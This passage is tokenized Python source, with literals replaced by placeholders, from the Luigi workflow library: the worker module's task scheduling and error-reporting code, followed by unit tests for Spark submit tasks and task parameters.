is_set ( ) : <EOL> logger . info ( "<STR_LIT>" % self . _worker_id ) <EOL> break <EOL> with fork_lock : <EOL> try : <EOL> self . _scheduler . ping ( worker = self . _worker_id ) <EOL> except : <EOL> logger . warning ( '<STR_LIT>' ) <EOL> class Worker ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , scheduler = None , worker_id = None , worker_processes = <NUM_LIT:1> , assistant = False , ** kwargs ) : <EOL> if scheduler is None : <EOL> scheduler = CentralPlannerScheduler ( ) <EOL> self . worker_processes = int ( worker_processes ) <EOL> self . _worker_info = self . _generate_worker_info ( ) <EOL> if not worker_id : <EOL> worker_id = '<STR_LIT>' % '<STR_LIT:U+002CU+0020>' . join ( [ '<STR_LIT>' % ( k , v ) for k , v in self . _worker_info ] ) <EOL> self . _config = worker ( ** kwargs ) <EOL> assert self . _config . wait_interval >= _WAIT_INTERVAL_EPS , "<STR_LIT>" <EOL> assert self . _config . wait_jitter >= <NUM_LIT:0.0> , "<STR_LIT>" <EOL> self . _id = worker_id <EOL> self . _scheduler = scheduler <EOL> self . _assistant = assistant <EOL> self . _stop_requesting_work = False <EOL> self . host = socket . gethostname ( ) <EOL> self . _scheduled_tasks = { } <EOL> self . _suspended_tasks = { } <EOL> self . _first_task = None <EOL> self . add_succeeded = True <EOL> self . run_succeeded = True <EOL> self . unfulfilled_counts = collections . defaultdict ( int ) <EOL> if not self . _config . no_install_shutdown_handler : <EOL> try : <EOL> signal . signal ( signal . SIGUSR1 , self . handle_interrupt ) <EOL> except AttributeError : <EOL> pass <EOL> if worker_processes == <NUM_LIT:1> : <EOL> self . _task_result_queue = DequeQueue ( ) <EOL> else : <EOL> self . _task_result_queue = multiprocessing . Queue ( ) <EOL> self . _running_tasks = { } <EOL> self . _add_task_history = [ ] <EOL> self . 
_get_work_response_history = [ ] <EOL> def _add_task ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> task_id = kwargs [ '<STR_LIT>' ] <EOL> status = kwargs [ '<STR_LIT:status>' ] <EOL> runnable = kwargs [ '<STR_LIT>' ] <EOL> task = self . _scheduled_tasks . get ( task_id ) <EOL> if task : <EOL> msg = ( task , status , runnable ) <EOL> self . _add_task_history . append ( msg ) <EOL> self . _scheduler . add_task ( * args , ** kwargs ) <EOL> logger . info ( '<STR_LIT>' , task_id , status ) <EOL> def __enter__ ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _keep_alive_thread = KeepAliveThread ( self . _scheduler , self . _id , self . _config . ping_interval ) <EOL> self . _keep_alive_thread . daemon = True <EOL> self . _keep_alive_thread . start ( ) <EOL> return self <EOL> def __exit__ ( self , type , value , traceback ) : <EOL> """<STR_LIT>""" <EOL> self . _keep_alive_thread . stop ( ) <EOL> self . _keep_alive_thread . join ( ) <EOL> for task in self . _running_tasks . values ( ) : <EOL> if task . is_alive ( ) : <EOL> task . terminate ( ) <EOL> return False <EOL> def _generate_worker_info ( self ) : <EOL> args = [ ( '<STR_LIT>' , '<STR_LIT>' % random . randrange ( <NUM_LIT:0> , <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , self . worker_processes ) ] <EOL> try : <EOL> args += [ ( '<STR_LIT:host>' , socket . gethostname ( ) ) ] <EOL> except BaseException : <EOL> pass <EOL> try : <EOL> args += [ ( '<STR_LIT:username>' , getpass . getuser ( ) ) ] <EOL> except BaseException : <EOL> pass <EOL> try : <EOL> args += [ ( '<STR_LIT>' , os . getpid ( ) ) ] <EOL> except BaseException : <EOL> pass <EOL> try : <EOL> sudo_user = os . getenv ( "<STR_LIT>" ) <EOL> if sudo_user : <EOL> args . append ( ( '<STR_LIT>' , sudo_user ) ) <EOL> except BaseException : <EOL> pass <EOL> return args <EOL> def _validate_task ( self , task ) : <EOL> if not isinstance ( task , Task ) : <EOL> raise TaskException ( '<STR_LIT>' % task ) <EOL> if not task . 
initialized ( ) : <EOL> raise TaskException ( '<STR_LIT>' % task . __class__ . __name__ ) <EOL> def _log_complete_error ( self , task , tb ) : <EOL> log_msg = "<STR_LIT>" . format ( task = task , tb = tb ) <EOL> logger . warning ( log_msg ) <EOL> def _log_dependency_error ( self , task , tb ) : <EOL> log_msg = "<STR_LIT>" . format ( task = task , tb = tb ) <EOL> logger . warning ( log_msg ) <EOL> def _log_unexpected_error ( self , task ) : <EOL> logger . exception ( "<STR_LIT>" , task ) <EOL> def _email_complete_error ( self , task , formatted_traceback ) : <EOL> self . _email_error ( task , formatted_traceback , <EOL> subject = "<STR_LIT>" , <EOL> headline = "<STR_LIT>" , <EOL> ) <EOL> def _email_dependency_error ( self , task , formatted_traceback ) : <EOL> self . _email_error ( task , formatted_traceback , <EOL> subject = "<STR_LIT>" , <EOL> headline = "<STR_LIT>" , <EOL> ) <EOL> def _email_unexpected_error ( self , task , formatted_traceback ) : <EOL> self . _email_error ( task , formatted_traceback , <EOL> subject = "<STR_LIT>" , <EOL> headline = "<STR_LIT>" , <EOL> ) <EOL> def _email_task_failure ( self , task , formatted_traceback ) : <EOL> self . _email_error ( task , formatted_traceback , <EOL> subject = "<STR_LIT>" , <EOL> headline = "<STR_LIT>" , <EOL> ) <EOL> def _email_error ( self , task , formatted_traceback , subject , headline ) : <EOL> formatted_subject = subject . format ( task = task , host = self . host ) <EOL> command = subprocess . list2cmdline ( sys . argv ) <EOL> message = notifications . format_task_error ( headline , task , command , formatted_traceback ) <EOL> notifications . send_error_email ( formatted_subject , message , task . owner_email ) <EOL> def add ( self , task , multiprocess = False ) : <EOL> """<STR_LIT>""" <EOL> if self . _first_task is None and hasattr ( task , '<STR_LIT>' ) : <EOL> self . _first_task = task . task_id <EOL> self . add_succeeded = True <EOL> if multiprocess : <EOL> queue = multiprocessing . Manager ( ) . 
Queue ( ) <EOL> pool = multiprocessing . Pool ( ) <EOL> else : <EOL> queue = DequeQueue ( ) <EOL> pool = SingleProcessPool ( ) <EOL> self . _validate_task ( task ) <EOL> pool . apply_async ( check_complete , [ task , queue ] ) <EOL> queue_size = <NUM_LIT:1> <EOL> try : <EOL> seen = set ( [ task . task_id ] ) <EOL> while queue_size : <EOL> current = queue . get ( ) <EOL> queue_size -= <NUM_LIT:1> <EOL> item , is_complete = current <EOL> for next in self . _add ( item , is_complete ) : <EOL> if next . task_id not in seen : <EOL> self . _validate_task ( next ) <EOL> seen . add ( next . task_id ) <EOL> pool . apply_async ( check_complete , [ next , queue ] ) <EOL> queue_size += <NUM_LIT:1> <EOL> except ( KeyboardInterrupt , TaskException ) : <EOL> raise <EOL> except Exception as ex : <EOL> self . add_succeeded = False <EOL> formatted_traceback = traceback . format_exc ( ) <EOL> self . _log_unexpected_error ( task ) <EOL> task . trigger_event ( Event . BROKEN_TASK , task , ex ) <EOL> self . _email_unexpected_error ( task , formatted_traceback ) <EOL> raise <EOL> finally : <EOL> pool . close ( ) <EOL> pool . join ( ) <EOL> return self . add_succeeded <EOL> def _add ( self , task , is_complete ) : <EOL> if self . _config . task_limit is not None and len ( self . _scheduled_tasks ) >= self . _config . task_limit : <EOL> logger . warning ( '<STR_LIT>' , task , self . _config . task_limit ) <EOL> return <EOL> formatted_traceback = None <EOL> try : <EOL> self . _check_complete_value ( is_complete ) <EOL> except KeyboardInterrupt : <EOL> raise <EOL> except AsyncCompletionException as ex : <EOL> formatted_traceback = ex . trace <EOL> except BaseException : <EOL> formatted_traceback = traceback . format_exc ( ) <EOL> if formatted_traceback is not None : <EOL> self . add_succeeded = False <EOL> self . _log_complete_error ( task , formatted_traceback ) <EOL> task . trigger_event ( Event . DEPENDENCY_MISSING , task ) <EOL> self . 
_email_complete_error ( task , formatted_traceback ) <EOL> deps = None <EOL> status = UNKNOWN <EOL> runnable = False <EOL> elif is_complete : <EOL> deps = None <EOL> status = DONE <EOL> runnable = False <EOL> task . trigger_event ( Event . DEPENDENCY_PRESENT , task ) <EOL> elif _is_external ( task ) : <EOL> deps = None <EOL> status = PENDING <EOL> runnable = worker ( ) . retry_external_tasks <EOL> task . trigger_event ( Event . DEPENDENCY_MISSING , task ) <EOL> logger . warning ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , task ) <EOL> else : <EOL> try : <EOL> deps = task . deps ( ) <EOL> except Exception as ex : <EOL> formatted_traceback = traceback . format_exc ( ) <EOL> self . add_succeeded = False <EOL> self . _log_dependency_error ( task , formatted_traceback ) <EOL> task . trigger_event ( Event . BROKEN_TASK , task , ex ) <EOL> self . _email_dependency_error ( task , formatted_traceback ) <EOL> deps = None <EOL> status = UNKNOWN <EOL> runnable = False <EOL> else : <EOL> status = PENDING <EOL> runnable = True <EOL> if task . disabled : <EOL> status = DISABLED <EOL> if deps : <EOL> for d in deps : <EOL> self . _validate_dependency ( d ) <EOL> task . trigger_event ( Event . DEPENDENCY_DISCOVERED , task , d ) <EOL> yield d <EOL> deps = [ d . task_id for d in deps ] <EOL> self . _scheduled_tasks [ task . task_id ] = task <EOL> self . _add_task ( worker = self . _id , task_id = task . task_id , status = status , <EOL> deps = deps , runnable = runnable , priority = task . priority , <EOL> resources = task . process_resources ( ) , <EOL> params = task . to_str_params ( ) , <EOL> family = task . task_family , <EOL> module = task . 
task_module ) <EOL> def _validate_dependency ( self , dependency ) : <EOL> if isinstance ( dependency , Target ) : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> elif not isinstance ( dependency , Task ) : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> def _check_complete_value ( self , is_complete ) : <EOL> if is_complete not in ( True , False ) : <EOL> if isinstance ( is_complete , TracebackWrapper ) : <EOL> raise AsyncCompletionException ( is_complete . trace ) <EOL> raise Exception ( "<STR_LIT>" % is_complete ) <EOL> def _add_worker ( self ) : <EOL> self . _worker_info . append ( ( '<STR_LIT>' , self . _first_task ) ) <EOL> self . _scheduler . add_worker ( self . _id , self . _worker_info ) <EOL> def _log_remote_tasks ( self , running_tasks , n_pending_tasks , n_unique_pending ) : <EOL> logger . debug ( "<STR_LIT>" ) <EOL> logger . debug ( "<STR_LIT>" ) <EOL> if running_tasks : <EOL> for r in running_tasks : <EOL> logger . debug ( '<STR_LIT>' , r [ '<STR_LIT>' ] , r [ '<STR_LIT>' ] ) <EOL> elif n_pending_tasks : <EOL> logger . debug ( "<STR_LIT>" , n_pending_tasks ) <EOL> if n_unique_pending : <EOL> logger . debug ( "<STR_LIT>" , n_unique_pending ) <EOL> def _get_work ( self ) : <EOL> if self . _stop_requesting_work : <EOL> return None , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> <EOL> logger . debug ( "<STR_LIT>" ) <EOL> r = self . _scheduler . get_work ( <EOL> worker = self . _id , <EOL> host = self . host , <EOL> assistant = self . _assistant , <EOL> current_tasks = list ( self . _running_tasks . keys ( ) ) , <EOL> ) <EOL> n_pending_tasks = r [ '<STR_LIT>' ] <EOL> task_id = r [ '<STR_LIT>' ] <EOL> running_tasks = r [ '<STR_LIT>' ] <EOL> n_unique_pending = r [ '<STR_LIT>' ] <EOL> self . _get_work_response_history . append ( dict ( <EOL> task_id = task_id , <EOL> running_tasks = running_tasks , <EOL> ) ) <EOL> if task_id is not None and task_id not in self . _scheduled_tasks : <EOL> logger . info ( '<STR_LIT>' , task_id ) <EOL> try : <EOL> self . 
_scheduled_tasks [ task_id ] = load_task ( module = r . get ( '<STR_LIT>' ) , <EOL> task_name = r [ '<STR_LIT>' ] , <EOL> params_str = r [ '<STR_LIT>' ] ) <EOL> except TaskClassException as ex : <EOL> msg = '<STR_LIT>' % task_id <EOL> logger . exception ( msg ) <EOL> subject = '<STR_LIT>' % msg <EOL> error_message = notifications . wrap_traceback ( ex ) <EOL> notifications . send_error_email ( subject , error_message ) <EOL> self . _add_task ( worker = self . _id , task_id = task_id , status = FAILED , runnable = False , <EOL> assistant = self . _assistant ) <EOL> task_id = None <EOL> self . run_succeeded = False <EOL> return task_id , running_tasks , n_pending_tasks , n_unique_pending <EOL> def _run_task ( self , task_id ) : <EOL> task = self . _scheduled_tasks [ task_id ] <EOL> p = self . _create_task_process ( task ) <EOL> self . _running_tasks [ task_id ] = p <EOL> if self . worker_processes > <NUM_LIT:1> : <EOL> with fork_lock : <EOL> p . start ( ) <EOL> else : <EOL> p . run ( ) <EOL> def _create_task_process ( self , task ) : <EOL> def update_tracking_url ( tracking_url ) : <EOL> self . _scheduler . add_task ( <EOL> task_id = task . task_id , <EOL> worker = self . _id , <EOL> status = RUNNING , <EOL> tracking_url = tracking_url , <EOL> ) <EOL> def update_status_message ( message ) : <EOL> self . _scheduler . set_task_status_message ( task . task_id , message ) <EOL> return TaskProcess ( <EOL> task , self . _id , self . _task_result_queue , update_tracking_url , update_status_message , <EOL> random_seed = bool ( self . worker_processes > <NUM_LIT:1> ) , <EOL> worker_timeout = self . _config . timeout <EOL> ) <EOL> def _purge_children ( self ) : <EOL> """<STR_LIT>""" <EOL> for task_id , p in six . iteritems ( self . _running_tasks ) : <EOL> if not p . is_alive ( ) and p . exitcode : <EOL> error_msg = '<STR_LIT>' % ( task_id , p . exitcode ) <EOL> elif p . timeout_time is not None and time . time ( ) > float ( p . timeout_time ) and p . is_alive ( ) : <EOL> p . 
terminate ( ) <EOL> error_msg = '<STR_LIT>' % task_id <EOL> else : <EOL> continue <EOL> logger . info ( error_msg ) <EOL> self . _task_result_queue . put ( ( task_id , FAILED , error_msg , [ ] , [ ] ) ) <EOL> def _handle_next_task ( self ) : <EOL> """<STR_LIT>""" <EOL> while True : <EOL> self . _purge_children ( ) <EOL> try : <EOL> task_id , status , expl , missing , new_requirements = ( <EOL> self . _task_result_queue . get ( <EOL> timeout = self . _config . wait_interval ) ) <EOL> except Queue . Empty : <EOL> return <EOL> task = self . _scheduled_tasks [ task_id ] <EOL> if not task or task_id not in self . _running_tasks : <EOL> continue <EOL> external_task_retryable = _is_external ( task ) and self . _config . retry_external_tasks <EOL> if status == FAILED and not external_task_retryable : <EOL> self . _email_task_failure ( task , expl ) <EOL> new_deps = [ ] <EOL> if new_requirements : <EOL> new_req = [ load_task ( module , name , params ) <EOL> for module , name , params in new_requirements ] <EOL> for t in new_req : <EOL> self . add ( t ) <EOL> new_deps = [ t . task_id for t in new_req ] <EOL> self . _add_task ( worker = self . _id , <EOL> task_id = task_id , <EOL> status = status , <EOL> expl = json . dumps ( expl ) , <EOL> resources = task . process_resources ( ) , <EOL> runnable = None , <EOL> params = task . to_str_params ( ) , <EOL> family = task . task_family , <EOL> module = task . task_module , <EOL> new_deps = new_deps , <EOL> assistant = self . _assistant ) <EOL> self . _running_tasks . pop ( task_id ) <EOL> if missing : <EOL> reschedule = True <EOL> for task_id in missing : <EOL> self . unfulfilled_counts [ task_id ] += <NUM_LIT:1> <EOL> if ( self . unfulfilled_counts [ task_id ] > <EOL> self . _config . max_reschedules ) : <EOL> reschedule = False <EOL> if reschedule : <EOL> self . add ( task ) <EOL> self . 
run_succeeded &= ( status == DONE ) or ( len ( new_deps ) > <NUM_LIT:0> ) <EOL> return <EOL> def _sleeper ( self ) : <EOL> while True : <EOL> jitter = self . _config . wait_jitter <EOL> wait_interval = self . _config . wait_interval + random . uniform ( <NUM_LIT:0> , jitter ) <EOL> logger . debug ( '<STR_LIT>' , wait_interval ) <EOL> time . sleep ( wait_interval ) <EOL> yield <EOL> def _keep_alive ( self , n_pending_tasks , n_unique_pending ) : <EOL> """<STR_LIT>""" <EOL> if not self . _config . keep_alive : <EOL> return False <EOL> elif self . _assistant : <EOL> return True <EOL> else : <EOL> return n_pending_tasks and ( n_unique_pending or not self . _config . count_uniques ) <EOL> def handle_interrupt ( self , signum , _ ) : <EOL> """<STR_LIT>""" <EOL> if signum == signal . SIGUSR1 : <EOL> self . _config . keep_alive = False <EOL> self . _stop_requesting_work = True <EOL> def run ( self ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( '<STR_LIT>' , self . worker_processes ) <EOL> sleeper = self . _sleeper ( ) <EOL> self . run_succeeded = True <EOL> self . _add_worker ( ) <EOL> while True : <EOL> while len ( self . _running_tasks ) >= self . worker_processes : <EOL> logger . debug ( '<STR_LIT>' , len ( self . _running_tasks ) ) <EOL> self . _handle_next_task ( ) <EOL> task_id , running_tasks , n_pending_tasks , n_unique_pending = self . _get_work ( ) <EOL> if task_id is None : <EOL> if not self . _stop_requesting_work : <EOL> self . _log_remote_tasks ( running_tasks , n_pending_tasks , n_unique_pending ) <EOL> if len ( self . _running_tasks ) == <NUM_LIT:0> : <EOL> if self . _keep_alive ( n_pending_tasks , n_unique_pending ) : <EOL> six . next ( sleeper ) <EOL> continue <EOL> else : <EOL> break <EOL> else : <EOL> self . _handle_next_task ( ) <EOL> continue <EOL> logger . debug ( "<STR_LIT>" , n_pending_tasks ) <EOL> self . _run_task ( task_id ) <EOL> while len ( self . _running_tasks ) : <EOL> logger . debug ( '<STR_LIT>' , len ( self . 
_running_tasks ) ) <EOL> self . _handle_next_task ( ) <EOL> return self . run_succeeded </s>
<s> from helpers import unittest <EOL> import os <EOL> import luigi <EOL> import luigi . contrib . hdfs <EOL> from luigi import six <EOL> from luigi . mock import MockTarget <EOL> from helpers import with_config <EOL> from luigi . contrib . external_program import ExternalProgramRunError <EOL> from luigi . contrib . spark import SparkSubmitTask , PySparkTask <EOL> from mock import patch , call , MagicMock <EOL> BytesIO = six . BytesIO <EOL> def poll_generator ( ) : <EOL> yield None <EOL> yield <NUM_LIT:1> <EOL> def setup_run_process ( proc ) : <EOL> poll_gen = poll_generator ( ) <EOL> proc . return_value . poll = lambda : next ( poll_gen ) <EOL> proc . return_value . returncode = <NUM_LIT:0> <EOL> proc . return_value . stdout = BytesIO ( ) <EOL> proc . return_value . stderr = BytesIO ( ) <EOL> class TestSparkSubmitTask ( SparkSubmitTask ) : <EOL> deploy_mode = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> entry_class = "<STR_LIT>" <EOL> jars = [ "<STR_LIT>" ] <EOL> py_files = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> files = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> conf = { "<STR_LIT>" : "<STR_LIT>" } <EOL> properties_file = "<STR_LIT>" <EOL> driver_memory = "<STR_LIT>" <EOL> driver_java_options = "<STR_LIT>" <EOL> driver_library_path = "<STR_LIT>" <EOL> driver_class_path = "<STR_LIT>" <EOL> executor_memory = "<STR_LIT>" <EOL> driver_cores = <NUM_LIT:8> <EOL> supervise = True <EOL> total_executor_cores = <NUM_LIT> <EOL> executor_cores = <NUM_LIT:10> <EOL> queue = "<STR_LIT>" <EOL> num_executors = <NUM_LIT:2> <EOL> archives = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> app = "<STR_LIT:file>" <EOL> def app_options ( self ) : <EOL> return [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> def output ( self ) : <EOL> return luigi . LocalTarget ( '<STR_LIT>' ) <EOL> class TestDefaultSparkSubmitTask ( SparkSubmitTask ) : <EOL> app = '<STR_LIT>' <EOL> def output ( self ) : <EOL> return luigi . 
LocalTarget ( '<STR_LIT>' ) <EOL> class TestPySparkTask ( PySparkTask ) : <EOL> def input ( self ) : <EOL> return MockTarget ( '<STR_LIT:input>' ) <EOL> def output ( self ) : <EOL> return MockTarget ( '<STR_LIT>' ) <EOL> def main ( self , sc , * args ) : <EOL> sc . textFile ( self . input ( ) . path ) . saveAsTextFile ( self . output ( ) . path ) <EOL> class SparkSubmitTaskTest ( unittest . TestCase ) : <EOL> ss = '<STR_LIT>' <EOL> @ with_config ( { '<STR_LIT>' : { '<STR_LIT>' : ss , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:path>' } } ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_run ( self , proc ) : <EOL> setup_run_process ( proc ) <EOL> job = TestSparkSubmitTask ( ) <EOL> job . run ( ) <EOL> self . assertEqual ( proc . call_args [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:2>' , '<STR_LIT:file>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> @ with_config ( { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:path>' } } ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_environment_is_set_correctly ( self , proc ) : <EOL> setup_run_process ( proc ) <EOL> job = TestSparkSubmitTask ( ) <EOL> job . run ( ) <EOL> self . assertIn ( '<STR_LIT>' , proc . call_args [ <NUM_LIT:1> ] [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( proc . 
call_args [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] , '<STR_LIT:path>' ) <EOL> @ with_config ( { '<STR_LIT>' : { '<STR_LIT>' : ss , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_defaults ( self , proc ) : <EOL> proc . return_value . returncode = <NUM_LIT:0> <EOL> job = TestDefaultSparkSubmitTask ( ) <EOL> job . run ( ) <EOL> self . assertEqual ( proc . call_args [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_handle_failed_job ( self , proc , file , logger ) : <EOL> proc . return_value . returncode = <NUM_LIT:1> <EOL> file . return_value = BytesIO ( b'<STR_LIT>' ) <EOL> try : <EOL> job = TestSparkSubmitTask ( ) <EOL> job . run ( ) <EOL> except ExternalProgramRunError as e : <EOL> self . assertEqual ( e . err , '<STR_LIT>' ) <EOL> self . assertIn ( '<STR_LIT>' , six . text_type ( e ) ) <EOL> self . assertIn ( call . info ( '<STR_LIT>' ) , <EOL> logger . mock_calls ) <EOL> else : <EOL> self . fail ( "<STR_LIT>" ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_dont_log_stderr_on_success ( self , proc , file , logger ) : <EOL> proc . return_value . returncode = <NUM_LIT:0> <EOL> file . return_value = BytesIO ( b'<STR_LIT>' ) <EOL> job = TestSparkSubmitTask ( ) <EOL> job . run ( ) <EOL> self . assertNotIn ( call . info ( <EOL> '<STR_LIT>' ) , <EOL> logger . mock_calls ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_app_must_be_set ( self , proc ) : <EOL> with self . 
assertRaises ( NotImplementedError ) : <EOL> job = SparkSubmitTask ( ) <EOL> job . run ( ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_app_interruption ( self , proc ) : <EOL> def interrupt ( ) : <EOL> raise KeyboardInterrupt ( ) <EOL> proc . return_value . wait = interrupt <EOL> try : <EOL> job = TestSparkSubmitTask ( ) <EOL> job . run ( ) <EOL> except KeyboardInterrupt : <EOL> pass <EOL> proc . return_value . kill . check_called ( ) <EOL> class PySparkTaskTest ( unittest . TestCase ) : <EOL> ss = '<STR_LIT>' <EOL> @ with_config ( { '<STR_LIT>' : { '<STR_LIT>' : ss , '<STR_LIT>' : "<STR_LIT>" } } ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_run ( self , proc ) : <EOL> setup_run_process ( proc ) <EOL> job = TestPySparkTask ( ) <EOL> job . run ( ) <EOL> proc_arg_list = proc . call_args [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> self . assertEqual ( proc_arg_list [ <NUM_LIT:0> : <NUM_LIT:7> ] , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertTrue ( os . path . exists ( proc_arg_list [ <NUM_LIT:7> ] ) ) <EOL> self . assertTrue ( proc_arg_list [ <NUM_LIT:8> ] . endswith ( '<STR_LIT>' ) ) <EOL> @ with_config ( { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> @ patch . dict ( '<STR_LIT>' , { '<STR_LIT>' : MagicMock ( ) } ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_pyspark_runner ( self , spark_context ) : <EOL> sc = spark_context . return_value . __enter__ . return_value <EOL> def mock_spark_submit ( task ) : <EOL> from luigi . contrib . pyspark_runner import PySparkRunner <EOL> PySparkRunner ( * task . app_command ( ) [ <NUM_LIT:1> : ] ) . run ( ) <EOL> self . assertTrue ( os . path . exists ( sc . addPyFile . call_args [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] ) ) <EOL> with patch . object ( SparkSubmitTask , '<STR_LIT>' , mock_spark_submit ) : <EOL> job = TestPySparkTask ( ) <EOL> job . run ( ) <EOL> sc . textFile . assert_called_with ( '<STR_LIT:input>' ) <EOL> sc . textFile . return_value . 
saveAsTextFile . assert_called_with ( '<STR_LIT>' ) </s>
<s> import luigi <EOL> luigi . namespace ( "<STR_LIT>" ) <EOL> class Foo ( luigi . Task ) : <EOL> p = luigi . Parameter ( ) <EOL> class Bar ( Foo ) : <EOL> task_namespace = "<STR_LIT>" <EOL> luigi . namespace ( ) </s>
<s> import doctest <EOL> import pickle <EOL> from helpers import unittest <EOL> from datetime import datetime , timedelta <EOL> import luigi <EOL> import luigi . task <EOL> from luigi . task_register import load_task <EOL> class DummyTask ( luigi . Task ) : <EOL> param = luigi . Parameter ( ) <EOL> bool_param = luigi . BoolParameter ( ) <EOL> int_param = luigi . IntParameter ( ) <EOL> float_param = luigi . FloatParameter ( ) <EOL> date_param = luigi . DateParameter ( ) <EOL> datehour_param = luigi . DateHourParameter ( ) <EOL> timedelta_param = luigi . TimeDeltaParameter ( ) <EOL> insignificant_param = luigi . Parameter ( significant = False ) <EOL> class DefaultInsignificantParamTask ( luigi . Task ) : <EOL> insignificant_param = luigi . Parameter ( significant = False , default = '<STR_LIT:value>' ) <EOL> necessary_param = luigi . Parameter ( significant = False ) <EOL> class TaskTest ( unittest . TestCase ) : <EOL> def test_tasks_doctest ( self ) : <EOL> doctest . testmod ( luigi . task ) <EOL> def test_task_to_str_to_task ( self ) : <EOL> params = dict ( <EOL> param = '<STR_LIT:test>' , <EOL> bool_param = True , <EOL> int_param = <NUM_LIT> , <EOL> float_param = <NUM_LIT> , <EOL> date_param = datetime ( <NUM_LIT> , <NUM_LIT:9> , <NUM_LIT> ) . date ( ) , <EOL> datehour_param = datetime ( <NUM_LIT> , <NUM_LIT:9> , <NUM_LIT> , <NUM_LIT:9> ) , <EOL> timedelta_param = timedelta ( <NUM_LIT> ) , <EOL> insignificant_param = '<STR_LIT:test>' ) <EOL> original = DummyTask ( ** params ) <EOL> other = DummyTask . from_str_params ( original . to_str_params ( ) ) <EOL> self . assertEqual ( original , other ) <EOL> def test_task_from_str_insignificant ( self ) : <EOL> params = { '<STR_LIT>' : '<STR_LIT>' } <EOL> original = DefaultInsignificantParamTask ( ** params ) <EOL> other = DefaultInsignificantParamTask . from_str_params ( params ) <EOL> self . assertEqual ( original , other ) <EOL> def test_task_missing_necessary_param ( self ) : <EOL> with self . assertRaises ( luigi . 
parameter . MissingParameterException ) : <EOL> DefaultInsignificantParamTask . from_str_params ( { } ) <EOL> def test_external_tasks_loadable ( self ) : <EOL> task = load_task ( "<STR_LIT>" , "<STR_LIT>" , { } ) <EOL> assert ( isinstance ( task , luigi . ExternalTask ) ) <EOL> def test_flatten ( self ) : <EOL> flatten = luigi . task . flatten <EOL> self . assertEqual ( sorted ( flatten ( { '<STR_LIT:a>' : '<STR_LIT:foo>' , '<STR_LIT:b>' : '<STR_LIT:bar>' } ) ) , [ '<STR_LIT:bar>' , '<STR_LIT:foo>' ] ) <EOL> self . assertEqual ( sorted ( flatten ( [ '<STR_LIT:foo>' , [ '<STR_LIT:bar>' , '<STR_LIT>' ] ] ) ) , [ '<STR_LIT:bar>' , '<STR_LIT:foo>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( flatten ( '<STR_LIT:foo>' ) , [ '<STR_LIT:foo>' ] ) <EOL> self . assertEqual ( flatten ( <NUM_LIT> ) , [ <NUM_LIT> ] ) <EOL> self . assertEqual ( flatten ( ( len ( i ) for i in [ "<STR_LIT:foo>" , "<STR_LIT>" ] ) ) , [ <NUM_LIT:3> , <NUM_LIT:5> ] ) <EOL> self . assertRaises ( 